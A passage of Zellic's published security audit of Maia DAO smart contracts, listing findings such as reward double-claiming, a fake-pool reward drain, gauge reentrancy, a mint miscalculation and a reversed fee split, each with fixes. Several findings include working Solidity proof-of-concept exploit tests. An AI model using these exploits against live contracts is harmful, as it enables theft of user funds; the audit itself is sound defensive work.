UniswapV3Gauge gauge = createGaugeAndAddToGaugeBoost(pool, 10); uniswapV3GaugeFactory.addBribeToGauge(gauge, address(bribeToken)); hevm.prank(address(0x666)); StealBribes stealBribes = new StealBribes(); rewardToken.mint(address(this), 1); rewardToken.approve(address(bHermesToken), 1); bHermesToken.deposit(1, address(stealBribes)); hevm.prank(address(0x666)); stealBribes.steal(uniswapV3GaugeFactory, address(bribeToken), bHermesToken.gaugeWeight()); assertEq(bribeToken.balanceOf(address(stealBribes)), 100000 ether); } This allows an attacker to steal all of the bribe tokens held by the flywheel rewards contract. The onlyGaugeFactory modifier should be used to prevent anyone but the factory from adding gauges to the flywheel. This issue was fixed by Maia DAO in commit f7ab226. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Missing transfer hook in TalosStrategyStaked", + "labels": [ + "Zellic" + ], + "body": "Target: TalosStrategyStaked Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The TalosStrategyStaked is created by the TalosStrategyStakedFactory and added to the flywheel: function createTalosV3Strategy( IUniswapV3Pool pool, ITalosOptimizer optimizer, address strategyManager, bytes memory data ) internal override returns (TalosBaseStrategy strategy) { BoostAggregator boostAggregator = abi.decode(data, (BoostAggregator)); strategy = DeployStaked.createTalosV3Strategy( pool, optimizer, boostAggregator, strategyManager, flywheel, owner() ); flywheel.addStrategyForRewards(strategy); } The strategy is responsible for managing a Uniswap V3 non-fungible position and can either rerange or rebalance and try collecting and accruing user rewards. 
When flywheel.accrue is called, the amount of rewards a user accrues is based on their balance of the strategy: function accrueUser(ERC20 strategy, address user, uint256 index) private returns (uint256) { uint256 supplierIndex = userIndex[strategy][user]; userIndex[strategy][user] = index; if (supplierIndex == 0) { supplierIndex = ONE; } uint256 deltaIndex = index - supplierIndex; uint256 supplierTokens = address(flywheelBooster) != address(0) ? flywheelBooster.boostedBalanceOf(strategy, user) : strategy.balanceOf(user); uint256 supplierDelta = (supplierTokens * deltaIndex) / ONE; uint256 supplierAccrued = rewardsAccrued[user] + supplierDelta; rewardsAccrued[user] = supplierAccrued; emit AccrueRewards(strategy, user, supplierDelta, index); return supplierAccrued; } The issue is that since TalosStrategyStaked implements ERC20, there is nothing to stop someone from transferring their strategy tokens to another user and claiming the reward again. To confirm this finding, we wrote the following test case: function testTransferStalkerTokens() public { address user3 = address(0xFACE1); uint amount0Desired = 10000; deposit(amount0Desired, amount0Desired, user1); talosBaseStrategy.rerange(); flywheel.accrue(talosBaseStrategy, user1); assertEq(flywheel.rewardsAccrued(user1), 132275132275132275131); assertEq(flywheel.rewardsAccrued(user2), 0); assertEq(flywheel.rewardsAccrued(user3), 0); uint bal = talosBaseStrategy.balanceOf(user1); hevm.prank(user1); talosBaseStrategy.transfer(user2, bal); flywheel.accrue(talosBaseStrategy, user2); assertEq(flywheel.rewardsAccrued(user1), 132275132275132275131); assertEq(flywheel.rewardsAccrued(user2), 132275132275133597876); assertEq(flywheel.rewardsAccrued(user3), 0); hevm.prank(user2); talosBaseStrategy.transfer(user3, bal); flywheel.accrue(talosBaseStrategy, user3); assertEq(flywheel.rewardsAccrued(user1), 132275132275132275131); assertEq(flywheel.rewardsAccrued(user2), 132275132275133597876); assertEq(flywheel.rewardsAccrued(user3), 132275132275133597876); } An attacker can accrue rewards for a TalosStrategyStaked strategy and then transfer their strategy tokens and claim the rewards a second time. This can continue, allowing the attacker to drain all unclaimed rewards. The TalosStrategyStaked should ensure that flywheel.accrue is called whenever tokens are transferred, burned, or minted; a sketch of such a hook appears just below. This issue was fixed by Maia DAO in commits 5b73dd5, 5a996f3, and 227e33d. Zellic Maia DAO", "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" }, { "title": "3.3 Lack of validation when creating a Talos staked strategy", "labels": [ "Zellic" ], "body": " Target: TalosStrategyStakedFactory Category: Coding Mistakes Likelihood: High Severity: Critical : Critical When creating a new TalosStrategyStaked via the TalosStrategyStakedFactory, the createTalosBaseStrategy is called, which in turn calls createTalosV3Strategy and then DeployStaked.createTalosV3Strategy. 
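Returning to finding 3.2 above, a sketch of the recommended accrual hook, assuming an OpenZeppelin-style _beforeTokenTransfer override is available (the shipped fix may differ):

function _beforeTokenTransfer(address from, address to, uint256 amount) internal override {
    // settle both sides' reward indexes before balances move, so the same
    // tokens cannot be used to claim rewards twice; covers mint and burn too
    if (from != address(0)) flywheel.accrue(ERC20(address(this)), from);
    if (to != address(0)) flywheel.accrue(ERC20(address(this)), to);
    super._beforeTokenTransfer(from, to, amount);
}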
The strategy is then added to the flywheel: function createTalosBaseStrategy( IUniswapV3Pool pool, ITalosOptimizer optimizer, address strategyManager, bytes memory data ) external { if (optimizerFactory.optimizerIds(TalosOptimizer(address(optimizer))) =) 0) revert UnrecognizedOptimizer(); TalosBaseStrategy strategy = createTalosV3Strategy(pool, optimizer, strategyManager, data); strategyIds[strategy] = strategies.length; strategies.push(strategy); } function createTalosV3Strategy( IUniswapV3Pool pool, ITalosOptimizer optimizer, address strategyManager, bytes memory data ) internal override returns (TalosBaseStrategy strategy) { BoostAggregator boostAggregator = abi.decode(data, (BoostAggregator)); strategy = DeployStaked.createTalosV3Strategy( pool, optimizer, boostAggregator, strategyManager, Zellic Maia DAO flywheel, owner() ); flywheel.addStrategyForRewards(strategy); } library DeployStaked { function createTalosV3Strategy( IUniswapV3Pool pool, ITalosOptimizer optimizer, BoostAggregator boostAggregator, address strategyManager, FlywheelCoreInstant flywheel, address owner ) public returns (TalosBaseStrategy) { return new TalosStrategyStaked( pool, optimizer, boostAggregator, strategyManager, flywheel, owner ); } } The only validation on any of the parameters is that the optimizer was created by the optimizer factory. The pool and strategyManager come directly from the function arguments, and the boostAggregator comes from decoding the user-supplied data. This boost aggregator then provides the strategy nonfungiblePositionManager via _bo ostAggregator.nonfungiblePositionManager(), so it is also controllable. This means that it is very easy to manipulate the balance of the strategy as we can make strategy.deposit always succeed. Using a fake pool, it is possible to do the following: 1. Set up the fake pool that will always mint as many tokens as requested when calling deposit. 2. With user 1, deposit and generate a single-strategy token. Zellic Maia DAO 3. Set up the fake pool to generate a single reward on the next deposit. 4. With user 2, deposit and generate a large number of tokens (this will be the amount of reward tokens stolen). 5. Transfer these tokens back to user 1. 6. Since the balance of user 1 is now high but the user\u2019s reward index is still ONE, they are able to claim as many rewards as they have strategy tokens: uint256 deltaIndex = index - supplierIndex; /) use the booster or token balance to calculate reward balance multiplier uint256 supplierTokens = address(flywheelBooster) !) address(0) ? 
flywheelBooster.boostedBalanceOf(strategy, user) : strategy.balanceOf(user); /) accumulate rewards by multiplying user tokens by rewardsPerToken index and adding on unclaimed uint256 supplierDelta = (supplierTokens * deltaIndex) / ONE; uint256 supplierAccrued = rewardsAccrued[user] + supplierDelta; rewardsAccrued[user] = supplierAccrued; To confirm this finding, we wrote the following test case: contract FakePool { struct Slot0 { uint160 sqrtPriceX96; int24 tick; uint16 observationIndex; uint16 observationCardinality; uint16 observationCardinalityNext; uint8 feeProtocol; bool unlocked; } struct IncreaseLiquidityParams { uint256 tokenId; uint256 amount0Desired; uint256 amount1Desired; uint256 amount0Min; Zellic Maia DAO uint256 amount1Min; uint256 deadline; } struct CollectParams { uint256 tokenId; address recipient; uint128 amount0Max; uint128 amount1Max; } address public nonfungiblePositionManager = address(this); address public token0 = address(this); address public token1 = address(this); int24 public tickSpacing = 3; uint24 public fee = 3000; Slot0 public slot0; constructor() { slot0.tick = 1000; } function observe(uint32[] calldata) public returns (int56[] memory, uint160[] memory) { int56[] memory tickCumulatives = new int56[](2); uint160[] memory o = new uint160[](2); tickCumulatives[0] = 1000; tickCumulatives[1] = 100000; return (tickCumulatives, o); } function increaseLiquidity(IncreaseLiquidityParams calldata params) public returns ( uint128, uint256, uint256 ) { return (uint128(params.amount0Desired), params.amount0Desired, params.amount0Desired); Zellic Maia DAO } function setOwnRewardsDepot(address) public {} function transferFrom( address, address, uint256 ) public {} function approve(address, uint256) public {} function collect(CollectParams calldata) public returns (uint256, uint256) { return (0, 0); } function depositAndStake(uint256) public {} function transfer(address, uint256) public {} function unstakeAndWithdraw(uint256) public {} fallback() external { revert(); } } function testTalosFactory() external { uint256 INITIAL_REWARDS = 1e18; TalosStrategyStakedFactory talosStrategyStakedFactory; TalosOptimizer talosOptimizer; (pool, poolContract) = UniswapV3Assistant.createPool( uniswapV3Factory, address(token0), address(token1), poolFee ); { OptimizerFactory optimizerFactory = new OptimizerFactory(); Zellic Maia DAO BoostAggregatorFactory boostAggregatorFactory = new BoostAggregatorFactory( uniswapV3StakerContract ); talosStrategyStakedFactory = new TalosStrategyStakedFactory( nonfungiblePositionManager, optimizerFactory, boostAggregatorFactory ); optimizerFactory.createTalosOptimizer( 100, 40, 16, 2000, type(uint256).max, address(this) ); optimizerFactory.createTalosOptimizer( 100, 40, 16, 2000, type(uint256).max, address(this) ); TalosOptimizer[] memory optimizers = optimizerFactory.getOptimizers(); talosOptimizer = optimizers[optimizers.length - 1]; boostAggregatorFactory.createBoostAggregator(address(this)); BoostAggregator[] memory boostAggregators = boostAggregatorFactory .getBoostAggregators(); BoostAggregator boostAggregator = boostAggregators[boostAggregators.length - 1]; talosStrategyStakedFactory.createTalosBaseStrategy( pool, talosOptimizer, address(this), abi.encode(boostAggregator) ); } Zellic Maia DAO FlywheelCoreInstant flywheel = talosStrategyStakedFactory.flywheel(); FlywheelInstantRewards rewards = talosStrategyStakedFactory.rewards(); TalosBaseStrategy[] memory strategies = talosStrategyStakedFactory.getStrategies(); TalosBaseStrategy realStrategy = 
strategies[strategies.length - 1]; /) realStrategy has some rewards, not yet distributed to everyone rewardToken.mint(address(rewards.rewardsDepot()), INITIAL_REWARDS); flywheel.accrue(realStrategy, address(0x1234)); address attacker1 = address(0x666); address attacker2 = address(0x777); /)attacker starts 1 reward token rewardToken.mint(address(attacker1), 1); hevm.startPrank(attacker1); FakePool fakePool = new FakePool(); talosStrategyStakedFactory.createTalosBaseStrategy( IUniswapV3Pool(address(fakePool)), talosOptimizer, address(fakePool), abi.encode(address(fakePool)) ); strategies = talosStrategyStakedFactory.getStrategies(); TalosBaseStrategy strategy = strategies[strategies.length - 1]; assertEq(rewardToken.balanceOf(attacker1), 1); strategy.deposit(1, 1, attacker1); rewardToken.transfer(address(rewards.rewardsDepot()), 1); strategy.deposit(rewardToken.balanceOf(address(rewards)), 1, attacker2); hevm.stopPrank(); hevm.startPrank(attacker2); strategy.transfer(attacker1, strategy.balanceOf(attacker2)); hevm.stopPrank(); Zellic Maia DAO hevm.startPrank(attacker1); flywheel.accrue(strategy, attacker1); flywheel.claimRewards(attacker1); assertEq(rewardToken.balanceOf(attacker1), INITIAL_REWARDS + 1); } A user is able to use a fake pool to create a malicious strategy and use it to drain any unclaimed rewards. The nonfungiblePositionManager used by the TalosStrategyStaked should be vali- dated to be the same as the TalosBaseStrategyFactory. The supplied pool could also be validated to ensure that it is initialized and known to the nonfungiblePositionMana ger. This issue was fixed by Maia DAO in commit 9b87839. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Reentrancy when incrementing and decrementing gauges", + "labels": [ + "Zellic" + ], + "body": "Target: ERC20Gauges Category: Coding Mistakes Likelihood: High Severity: Critical : High The incrementGauges method takes a list of gauges and a list of weights, iterates through them to increase each supplied gauge with the corresponding weight, and then up- dates the global weights for the user. function incrementGauges(address[] calldata gaugeList, uint112[] calldata weights) external returns (uint256 newUserWeight) { uint256 size = gaugeList.length; if (weights.length !) size) revert SizeMismatchError(); /) store total in summary for a batch update on user/global state uint112 weightsSum; uint32 currentCycle = _getGaugeCycleEnd(); /) Update a gauge's specific state for (uint256 i = 0; i < size; ) { address gauge = gaugeList[i]; uint112 weight = weights[i]; weightsSum += weight; _incrementGaugeWeight(msg.sender, gauge, weight, currentCycle); unchecked { i+); } } return _incrementUserAndGlobalWeights(msg.sender, weightsSum, currentCycle); } When _incrementGaugeWeight is called, it triggers a call to accrueBribes on the sup- plied gauge before adding the weight to the getUserGaugeWeight. 
function _incrementGaugeWeight(address user, address gauge, uint112 weight, uint32 cycle) internal { if (_deprecatedGauges.contains(gauge)) revert InvalidGaugeError(); unchecked { if (cycle - block.timestamp <= incrementFreezeWindow) revert IncrementFreezeError(); } IBaseV2Gauge(gauge).accrueBribes(user); bool added = _userGauges[user].add(gauge); // idempotent add if (added && _userGauges[user].length() > maxGauges && !canContractExceedMaxGauges[user]) revert MaxGaugeError(); getUserGaugeWeight[user][gauge] += weight; _writeGaugeWeight(_getGaugeWeight[gauge], _add112, weight, cycle); emit IncrementGaugeWeight(user, gauge, weight, cycle); } Then, finally, the total weight is checked and the global weights are updated. function _incrementUserAndGlobalWeights(address user, uint112 weight, uint32 cycle) internal returns (uint112 newUserWeight) { newUserWeight = getUserWeight[user] + weight; // new user weight must be less than or equal to the total user weight if (newUserWeight > getVotes(user)) revert OverWeightError(); // Update gauge state getUserWeight[user] = newUserWeight; _writeGaugeWeight(_totalWeight, _add112, weight, cycle); } Since there are no checks on whether the gauges have been added to the approved 
To confirm this finding, we wrote the following test case: contract DoubleWeights { address gauge1; MockERC20Gauges gaugeWeight; function accrueBribes(address user) public { require( gaugeWeight.getUserGaugeWeight(address(this), address(gauge1)) =) 200, \u201cshould be 200\u201d ); require(gaugeWeight.getVotes(address(this)) =) 100, \u201cshould be 100\u201d); gaugeWeight.decrementGauge(address(gauge1), 100); } function double(address _gauge1, MockERC20Gauges _gaugeWeight) external { gauge1 = _gauge1; gaugeWeight = _gaugeWeight; Zellic Maia DAO gaugeWeight.incrementDelegation(address(this), 100); gaugeWeight.incrementGauge(gauge1, 100); require(gaugeWeight.getUserGaugeWeight(address(this), gauge1) =) 100, \u201cshould be 100\u201d); require(gaugeWeight.getVotes(address(this)) =) 100, \u201cshould be 100\u201d); address[] memory addresses = new address[](2); addresses[0] = gauge1; addresses[1] = address(this); uint112[] memory weights = new uint112[](2); weights[0] = 100; weights[1] = 0; gaugeWeight.incrementGauges(addresses, weights); } } function testGaugeReentrancy() external { hevm.prank(address(0x666)); DoubleWeights doubleWeights = new DoubleWeights(); token.mint(address(doubleWeights), 100); hevm.prank(address(0x666)); doubleWeights.double(address(gauge1), token); } A user is able to increment a gauge to be twice the amount of votes they control for a transaction. The nonReentrant modifier should be added to all of the increment/decrement meth- ods, and the gauges should be checked to ensure they are in the allowed list. Zellic Maia DAO This issue was fixed by Maia DAO in commit 9b87839. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Incorrect calculation of maximum-allowed mint", + "labels": [ + "Zellic" + ], + "body": "Target: ERC4626PartnerManager Category: Coding Mistakes Likelihood: Medium Severity: High : High The ERC4626PartnerManager contract allows partner tokens to be staked in order to receive utility tokens at a rate defined by bHermesRate. ///)) @notice Returns the maximum amount of assets that can be deposited by a user. ///)) @dev Returns the remaining balance of the bHermes divided by the bHermesRate. function maxDeposit(address) public view virtual override returns (uint256) { return (address(bHermesToken).balanceOf(address(this)) - totalSupply) / bHermesRate; } ///)) @notice Returns the maximum amount of assets that can be deposited by a user. ///)) @dev Returns the remaining balance of the bHermes divided by the bHermesRate. function maxMint(address) public view virtual override returns (uint256) { return (address(bHermesToken).balanceOf(address(this)) - totalSupply) / bHermesRate; } function _mint(address to, uint256 amount) internal virtual override { if (amount > maxMint(to)) revert ExceedsMaxDeposit(); bHermesToken.claimOutstanding(); ERC20MultiVotes(partnerGovernance).mint(address(this), amount * bHermesRate); super._mint(to, amount); } The issue is that the maxMint is incorrect when bHermesRate is greater than one because totalSupply should not be divided by bHermesRate. Only the bHermesToken balance Zellic Maia DAO should be, since this was increased by bHermesRate when minting. This allows for more partner bHermes tokens to be minted than there are backing bHermesTokens to support it. 
To confirm this finding, we wrote the following test case: function testDepositTakeover() public { assertEq(manager.bHermesRate(), 10); address user1 = address(0x111); address attacker = address(0x222); hermes.mint(address(this), 1000); hermes.approve(address(_bHermes), 1000); _bHermes.deposit(1000, address(this)); _bHermes.transfer(address(manager), 1000); partnerAsset.mint(address(user1), 51); hevm.prank(user1); partnerAsset.approve(address(manager), 51); partnerAsset.mint(address(attacker), 200); hevm.prank(attacker); partnerAsset.approve(address(manager), 200); assertEq(manager.maxMint(address(this)), 100); hevm.prank(user1); manager.deposit(51, user1); /) assertEq(manager.maxMint(user1), 49); hevm.prank(attacker); manager.deposit(94, attacker); hevm.prank(attacker); manager.deposit(6, attacker); hevm.prank(attacker); manager.claimOutstanding(); assertEq(manager.balanceOf(attacker), 100); assertEq(manager.partnerGovernance().balanceOf(attacker), 1000); Zellic Maia DAO } Allows a user to mint more partner bHermes tokens than there are underlying assets, preventing other users with staked partner tokens from being able to claim any utility tokens. Only the bHermesToken balance should be divided by the bHermesRate in both maxDepo sit and maxMint. This issue was fixed by Maia DAO in commit 5f00303. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Incorrect total gauge weight calculation", + "labels": [ + "Zellic" + ], + "body": "Target: ERC20Gauges Category: Coding Mistakes Likelihood: High Severity: High : High To help illustrate this issue, it is helpful to have some background on gauge, weight, and the functions that affect _totalWeight. Each gauge address is associated a weight. The weight represents how much of the weekly reward an active gauge will receive. The owner of the contract can manage the gauges and change their state from active to deprecated and vice versa. There are a few functions that are able to decrease the _totalWeight. The _removeGauge function allows the contract owner to add a gauge address to the _ deprecatedGauges array. This function also decreases the _totalWeight by the current weight of the gauge. There are also the decrementGauge and decrementGauges functions, which allow the user to decrease the _getGaugeWeight value for any gauge address (active and depre- cated) while at the same time decreasing the _totalWeight by the input weight value. Below are the steps to reproduce the issue. Preconditions: There are several active gauges. Users have assigned weight to these gauges. The _totalWeight is not zero. Steps: 1. The owner of the contract calls the removeGauge function for one of active gauges. 2. The gauge becomes deprecated; _totalWeight is decreased by the _getGaugeWe ight[gauge].currentWeight value. 3. The user calls the decrementGauge function for the same gauge with full assigned weight value. Zellic Maia DAO 4. The _totalWeight is repeatedly reduced by the getUserGaugeWeight[user][gaug e] value that was already taken into account in step 2, because the _getGaugeWe ight[gauge].currentWeight is the sum of all users\u2019 weight for the current gauge. 5. Anyone starts the queueRewardsForCycle() function of the FlywheelGaugeRewards contract when a new cycle occurs. 6. 
Inside this function, the nextRewards is calculated for all active gauges using the calculateGaugeAllocation function, where the quantity value is the total number of rewards queued for the next cycle. But due to the underestimation of the total value, the calculateGaugeAllocation function will return an inflated proportion of a quantity for the gauge. function calculateGaugeAllocation(address gauge, uint256 quantity) external view returns (uint256) { if (_deprecatedGauges.contains(gauge)) return 0; uint32 currentCycle = _getGaugeCycleEnd(); uint112 total = _getStoredWeight(_totalWeight, currentCycle); uint112 weight = _getStoredWeight(_getGaugeWeight[gauge], currentCycle); return (quantity * weight) / total; } After the completion of the queueRewardsForCycle function, the total amount of the reward assigned between the gauge contracts will be greater than the actual amount distributed by the minter. So, firstly, the rewards will be calculated incorrectly and, secondly, all gauge contracts will not be able to distribute the reward because the rewardToken balance of the FlywheelGaugeRewards contract is less than the total assigned amount of weekly reward. It will also be impossible to successfully release full weights from gauges because the _totalWeight will not correspond with the actual total weight. Reduce _totalWeight only for active gauges inside the decrementGauges function. This issue was fixed by Maia DAO in commit bc08905. Zellic Maia DAO", "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" }, { "title": "3.7 Protocol fee calculation is reversed", "labels": [ "Zellic" ], "body": " Target: BoostAggregator Category: Coding Mistakes Likelihood: High Severity: High : High The unstakeAndWithdraw function first unstakes the NFT and then calculates the pending rewards and splits them between the user and the protocol based on the current protocolFee (the default being 20%). function unstakeAndWithdraw(uint256 tokenId) external { address user = tokenIdToUser[tokenId]; if (user != msg.sender) revert NotTokenIdOwner(); uniswapV3Staker.unstakeToken(tokenId); uint256 pendingRewards = uniswapV3Staker.tokenIdRewards(tokenId) - tokenIdRewards[tokenId]; if (pendingRewards > DIVISIONER) { uint256 userRewards = (pendingRewards * protocolFee) / DIVISIONER; protocolRewards += pendingRewards - userRewards; address rewardsDepot = userToRewardsDepot[user]; if (rewardsDepot != address(0)) { uniswapV3Staker.claimReward(rewardsDepot, userRewards); } else { uniswapV3Staker.claimReward(user, userRewards); } } uniswapV3Staker.withdrawToken(tokenId, user, \u201c\u201d); } The issue is that the calculation is backwards; the userRewards will end up being only 20% of the pending rewards, and the protocol will take 80%. The protocol will receive a much higher percentage of the fees than intended. The new protocol rewards can be calculated with (pendingRewards * protocolFee) / DIVISIONER, and then the userRewards is the pendingRewards minus the protocol rewards. This issue was fixed by Maia DAO in commit 084dfac. 
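Spelled out, the corrected split from the recommendation (the newProtocolRewards temporary is illustrative):

uint256 newProtocolRewards = (pendingRewards * protocolFee) / DIVISIONER;
// the protocol keeps protocolFee (20% by default) and the user gets the rest
uint256 userRewards = pendingRewards - newProtocolRewards;
protocolRewards += newProtocolRewards;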
Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.8 Lack of verification when staking NFT", + "labels": [ + "Zellic" + ], + "body": "Target: UniswapV3Staker Category: Coding Mistakes Likelihood: High Severity: Medium : Low The stakeToken function takes a tokenId and can be used to stake or restake a token: function stakeToken(uint256 tokenId) external override { if (deposits[tokenId].stakedTimestamp !) 0) revert TokenStakedError(); (IUniswapV3Pool pool, int24 tickLower, int24 tickUpper, uint128 liquidity) = NFTPositionInfo.getPositionInfo(factory, nonfungiblePositionManager, tokenId); _stakeToken(tokenId, pool, tickLower, tickUpper, liquidity); } function _stakeToken(uint256 tokenId, IUniswapV3Pool pool, int24 tickLower, int24 tickUpper, uint128 liquidity) private { IncentiveKey memory key = IncentiveKey({ pool: pool, startTime: IncentiveTime.computeStart(block.timestamp) }); bytes32 incentiveId = IncentiveId.compute(key); if (incentives[incentiveId].totalRewardUnclaimed =) 0) revert NonExistentIncentiveError(); if (uint24(tickUpper - tickLower) < poolsMinimumWidth[pool]) revert RangeTooSmallError(); if (liquidity =) 0) revert NoLiquidityError(); stakedIncentiveKey[tokenId] = key; /) If user not attached to gauge, attach address tokenOwner = deposits[tokenId].owner; if (userAttachements[tokenOwner][pool] =) 0) { userAttachements[tokenOwner][pool] = tokenId; gauges[pool].attachUser(tokenOwner); Zellic Maia DAO } deposits[tokenId].stakedTimestamp = uint40(block.timestamp); incentives[incentiveId].numberOfStakes+); (, uint160 secondsPerLiquidityInsideX128, ) = pool.snapshotCumulativesInside( tickLower, tickUpper ); if (liquidity >) type(uint96).max) { _stakes[tokenId][incentiveId] = Stake({ secondsPerLiquidityInsideInitialX128: secondsPerLiquidityInsideX128, liquidityNoOverflow: type(uint96).max, liquidityIfOverflow: liquidity }); } else { Stake storage stake = _stakes[tokenId][incentiveId]; stake.secondsPerLiquidityInsideInitialX128 = secondsPerLiquidityInsideX128; stake.liquidityNoOverflow = uint96(liquidity); } emit TokenStaked(tokenId, incentiveId, liquidity); } The issue is that it does not check that the contract owns the token or that there is a corresponding Deposit for it. This means that the tokenOwner will end up being zero and still attached to the gauge, and the stakes will be updated even though the con- tract has no access to the token. Luckily it is not possible to unstakeToken the token because if there is a bribe depot, then nonfungiblePositionManager.collect is called and will fail, and if not, then key. pool.snapshotCumulativesInside will revert with TLU as both deposit.tickLower and deposit.tickUpper will be zero. /) from UniswapV3Staker.unstakeToken address bribeAddress = bribeDepots[key.pool]; Zellic Maia DAO if (bribeAddress !) address(0)) { (uint256 amount0, uint256 amount1) = nonfungiblePositionManager.collect( INonfungiblePositionManager.CollectParams({ tokenId: tokenId, recipient: bribeAddress, amount0Max: type(uint128).max, amount1Max: type(uint128).max }) ); emit feesCollected(bribeAddress, amount0, amount1); } ...)) (, uint160 secondsPerLiquidityInsideX128, ) = key.pool.snapshotCumulativesInside( deposit.tickLower, deposit.tickUpper ); A user can stake a token that is not owned by the contract, causing an invalid entry in the stakes and address zero to be attached to a gauge. 
The stakeToken method should ensure that there is a valid deposit for the token and that the contract is the current owner. This issue was fixed by Maia DAO in commit 5352be4. Maia DAO states: Followed recommendations only to verify that deposit.owner is not 0 address. Positions deposited in UniswapV3Staker are supposed to be allowed to be staked by anyone. The goal is to allow an automated system to re-stake any position if desired. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.9 Lack of slippage protection", + "labels": [ + "Zellic" + ], + "body": "Target: TalosBaseStrategy Category: Business Logic Likelihood: Medium Severity: Medium : Medium There is no slippage protection on any of the calls to increase or decrease liquid- ity, allowing for trades to be subject to MEV-style attacks such as front-running and sandwiching. When redeem is called, there is a call to decrease liquidity: (amount0, amount1) = _nonfungiblePositionManager.decreaseLiquidity( INonfungiblePositionManager.DecreaseLiquidityParams({ tokenId: tokenId, liquidity: liquidityToDecrease, amount0Min: 0, amount1Min: 0, deadline: block.timestamp }) ); Since amount0Min and amount1Min are both hardcoded to zero, it does not account for slippage. The values for amount0Min and amount1Min are also hardcoded to zero in the following functions: TalosStrategyVanilla._compoundFees - nonfungiblePositionManager.increaseL iquidity TalosBaseStrategy.init - nonfungiblePositionManager.mint TalosBaseStrategy.deposit - nonfungiblePositionManager.increaseLiquidity TalosBaseStrategy.redeem - nonfungiblePositionManager.decreaseLiquidity TalosBaseStrategy._withdrawAll - nonfungiblePositionManager.decreaseLiquid ity As stated in the Uniswap V3 docs for minting, increasing, and decreasing, \u201cIn produc- tion, amount0Min and amount1Min should be adjusted to create slippage protections.\u201d Zellic Maia DAO We recommend adding user parameters in that allow for the customization of the level of slippage tolerance so that amount0Min and amount1Min can be adjusted ac- cordingly. This issue was fixed by Maia DAO in commit ddcca86. Zellic Maia DAO", + "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" + }, + { + "title": "3.10 Potential loss of weekly emissions", + "labels": [ + "Zellic" + ], + "body": "Target: BaseV2Minter Category: Coding Mistakes Likelihood: Low Severity: Medium : Medium When there is a new period, the weekly emissions and growth are calculated and the new tokens are minted. The storage variable weekly then stores the amount of tokens that are able to be claimed with getRewards. function updatePeriod() public returns (uint256) { uint256 _period = activePeriod; if (block.timestamp >) _period + week &) initializer =) address(0)) { _period = (block.timestamp / week) * week; activePeriod = _period; weekly = weeklyEmission(); uint256 _circulatingSupply = circulatingSupply(); uint256 _growth = calculateGrowth(weekly); uint256 _required = _growth + weekly; uint256 share = (_required * daoShare) / base; _required += share; uint256 _balanceOf = underlying.balanceOf(address(this)); if (_balanceOf < _required) { HERMES(underlying).mint(address(this), _required - _balanceOf); } underlying.safeTransfer(address(vault), _growth); if (dao !) 
This issue was fixed by Maia DAO in commit ddcca86.", "html_url": "https://github.com/Zellic/publications/blob/master/Maia DAO February 2023 - Zellic Audit Report.pdf" }, { "title": "3.10 Potential loss of weekly emissions", "labels": [ "Zellic" ], "body": "Target: BaseV2Minter Category: Coding Mistakes Likelihood: Low Severity: Medium Impact: Medium When there is a new period, the weekly emissions and growth are calculated and the new tokens are minted. The storage variable weekly then stores the amount of tokens that are able to be claimed with getRewards. function updatePeriod() public returns (uint256) { uint256 _period = activePeriod; if (block.timestamp >= _period + week && initializer == address(0)) { _period = (block.timestamp / week) * week; activePeriod = _period; weekly = weeklyEmission(); uint256 _circulatingSupply = circulatingSupply(); uint256 _growth = calculateGrowth(weekly); uint256 _required = _growth + weekly; uint256 share = (_required * daoShare) / base; _required += share; uint256 _balanceOf = underlying.balanceOf(address(this)); if (_balanceOf < _required) { HERMES(underlying).mint(address(this), _required - _balanceOf); } underlying.safeTransfer(address(vault), _growth); if (dao != address(0)) underlying.safeTransfer(dao, share); emit Mint(msg.sender, weekly, _circulatingSupply, _growth, share); try flywheelGaugeRewards.queueRewardsForCycle() {} catch {} } return _period; } function getRewards() external returns (uint256 totalQueuedForCycle) { if (address(flywheelGaugeRewards) != msg.sender) revert NotFlywheelGaugeRewards(); totalQueuedForCycle = weekly; weekly = 0; underlying.safeTransfer(msg.sender, totalQueuedForCycle); } The issue is that there is no guarantee that getRewards will be called by the flywheel gauge rewards contract before a new period has started and updatePeriod is triggered again. This will overwrite the existing weekly variable, and those emissions can no longer be claimed by the contract. The flywheel gauge rewards contract could be unable to claim the correct amount of emissions if getRewards is not called within the period. Instead of assigning the new emissions to weekly, they could be added to it, allowing them to be collected even if multiple periods have occurred. This issue was fixed by Maia DAO in commit 70c96f0. 3.11 Lack of updating the getUserBoost Target: BoostAggregator Category: Coding Mistakes Likelihood: Medium Severity: Medium Impact: Medium In the withdrawGaugeBoost function, the decrementAllGaugesBoost function is called before a transfer is made in order to release the required amount of tokens. This is necessary because if the freeGaugeBoost value is less than amount, then the address(hermesGaugeBoost).safeTransfer(to, amount) call will not be successful. However, it is worth noting that the decrementAllGaugesBoost function only decreases the getUserGaugeBoost[msg.sender][gauge] value and does not modify the getUserBoost[user] value. function withdrawGaugeBoost(address to, uint256 amount) external onlyOwner { hermesGaugeBoost.decrementAllGaugesBoost(amount); address(hermesGaugeBoost).safeTransfer(to, amount); } function decrementAllGaugesBoost(uint256 boost) external { decrementGaugesBoostIndexed(boost, 0, _userGauges[msg.sender].length()); } function decrementGaugesBoostIndexed( uint256 boost, uint256 offset, uint256 num ) public { address[] memory gaugeList = _userGauges[msg.sender].values(); uint256 length = gaugeList.length; for (uint256 i = 0; i < num && i < length; ) { address gauge = gaugeList[offset + i]; GaugeState storage gaugeState = getUserGaugeBoost[msg.sender][gauge]; if 